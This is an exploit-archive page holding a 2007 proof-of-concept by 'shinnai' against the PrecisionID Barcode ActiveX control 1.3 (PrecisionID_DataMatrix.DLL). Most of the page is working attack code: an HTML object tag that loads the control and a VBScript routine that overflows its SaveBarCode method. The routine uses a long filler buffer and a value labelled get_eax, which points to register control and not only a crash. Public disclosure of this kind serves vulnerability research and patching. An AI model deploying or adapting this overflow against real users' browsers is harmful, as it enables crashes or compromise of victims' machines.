[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PrecisionID Barcode ActiveX 1.3 Denial of Service Exploit
# Published : 2007-05-12
# Author : shinnai
# Previous Title : ID Automation Linear Barcode ActiveX Denial of Service Exploit
# Next Title : Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC


<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/12</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------
 <b>PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denail of Service</b>
 url: http://www.precisionid.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to these exploits.
--------------------------------------------------------------------------------

<object classid='clsid:6C951D10-B07F-11DB-A6ED-0050C2490048' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  buff=String(304,"B")
     
  get_eax = unescape("%D1%60%61%61")

  buff2 = String(709,"C")

  egg = buff + get_eax + buff2
  
  test.SaveBarCode egg
 End Sub
</script>
</span></span>
</code></pre>

# www.Syue.com [2007-05-12]